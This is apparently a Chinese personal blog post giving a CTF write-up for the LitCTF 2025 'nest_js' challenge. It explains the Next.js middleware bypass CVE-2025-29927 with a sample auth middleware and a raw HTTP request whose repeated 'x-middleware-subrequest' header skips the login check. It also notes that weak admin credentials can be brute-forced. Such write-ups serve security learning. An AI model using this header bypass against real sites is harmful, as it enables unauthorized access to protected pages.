CVE-2025-29927

记录

发布日期: 2025-06-19

[LitCTF 2025]nest_js

对于很多的cve，由于水平有限，目前先不考虑修复等等问题，只是满足做题需要
题目提示你/dashboard
首先我们先分析架构，得到是next.js相关的
查找相关的发现，有这个cve
假设应用在 /middleware.ts 中实施了以下逻辑，用于验证用户是否登录，若未登录则阻止访问 /admin 路由

export function middleware(req: NextRequest) {
  const token = req.cookies.get('session');
  if (!token && req.nextUrl.pathname.startsWith('/admin')) {
    return NextResponse.redirect('/login');
  }
  return NextResponse.next();
}

使用如下请求头

1
2
3

GET /dashboard HTTP/1.1
Host: node1.anna.nssctf.cn:28441
x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware

可能让 Next.js 判定该请求是内部中间件调用，从而直接跳过此验证，成功访问 /dashboard
这道题目就是可以直接拿到flag的
还可以就是直接爆破得到账号密码
账号admin,密码password

wuk0Ng

https://web-wuk0ng.github.io/2025/06/19/CVE-2025-29927/

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源 wuk0Ng !

CTF 比赛

博客更新4

2025-06-21 记录

更新图片

ssti实战多方法解题1

2025-06-19 记录

CTF 安全学习

CVE-2025-29927

[LitCTF 2025]nest_js

你的赏识是我前进的动力